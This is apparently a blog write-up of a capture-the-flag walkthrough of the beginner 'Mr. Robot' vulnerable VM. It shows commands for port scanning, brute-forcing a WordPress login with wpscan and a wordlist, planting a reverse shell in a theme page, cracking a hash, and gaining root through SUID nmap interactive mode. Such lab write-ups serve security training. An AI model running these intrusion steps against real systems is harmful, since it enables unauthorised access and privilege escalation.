Mr. Robot



Based on the show, Mr. Robot.

This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find.

The VM isn’t too difficult. There isn’t any advanced exploitation or reverse engineering. The level is considered beginner-intermediate.


Mr. Robot is one of the few Hollywood productions that captured the spirit of the black hat hacker right. I wonder if this challenge can maintain that reputation. Let’s find out and let’s start with gathering some information about the target.

nmap -A -T4 -sV -p-


Looks like port 80 and 443 are open.


When I try the commands I feel a little bit like Neo and got to choose between the red pill and the blue pill. But then I’m want to scratch the layers and search inside the source code. Let’s start with the basics. Robots.txt gives me the first flag and a fsociety wordlist.


Looks like a md5 hash to me. Hash-identifier confirms it. But unfortunately it’s not a know hash.


When running Dirb, I get a long list with directories. One of them is the WordPress login page.


I tried wpscan, but it couldn’t enumerate usernames. Also there weren’t a lot useful vulnerabilities to exploit. Time for some thinking and manual labor.


Looks like I have found an username. Let’s see if we can brute force the password of this account with the found wordlist. The wordlist contains 858160 words. That’s gonna take some time with brute force. Maybe I can trim it down a bit.

sort ‘fsocity.dic’ | uniq > fsociety.dic
wc fsociety.dic
11451 11451 96747 fsociety.dic

Much better. Now for wpscan again.

wpscan –url –wp-content-dir ‘/wp-login.php’ –wordlist /root/Documents/CTF/mrRobot/fsociety.dic –threads 50 –username elliot


With the username:password I log in to the WordPress account.

Getting a shell


Let’s try and upload a dirty php.


That’s not gonna work. Because there is no way for me to change the permission on the format restriction, I choose another path. I’m gonna adjust a page.


Let’s take to top one and replace the code with a reverse shell code from pentestmonkey.


I’m in. Let’s grab a proper shell.

python -c ‘import pty;pty.spawn(“/bin/bash”)’

Inside the home directory there is a directory named robot which contained 2 files. One is the second flag and one contains the username ‘robot’ plus a hash. Looks like I need to crack this hash. Before using a time consuming tool, I check the hash with crackstation and it appears that it’s a known hash.


Time to bump up my privileges.

daemon@linux:/home/robot$ su robot
Password: abcdefghijklmnopqrstuvwxyz

robot@linux:~$ id
uid=1002(robot) gid=1002(robot) groups=1002(robot)

Let’s get flag number 2.

robot@linux:~$ cd /home/robot/
robot@linux:~$ ls
key-2-of-3.txt password.raw-md5
robot@linux:~$ cat key-2-of-3.txt

After I looked around some more in the system, I checked the installed applications to see what’s on this machine.

compgen -c | sort


It had an old version of nmap running. I will use the –interactive command to run a shell under the SUID root.

robot@linux:/$ nmap –interactive

Starting nmap V. 3.81 ( )
Welcome to Interactive Mode — press h <enter> for help
nmap> !sh
# id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)

Flag number 3

Time to get the third and final flag.

# cat /root/key-3-of-3.txt

The End!

I must say it was a fun challenge, but I really missed the continuation of the Mr. Robot theme inside the box. No themed clues or witty comments. Just obtaining root and collect the 3 flags.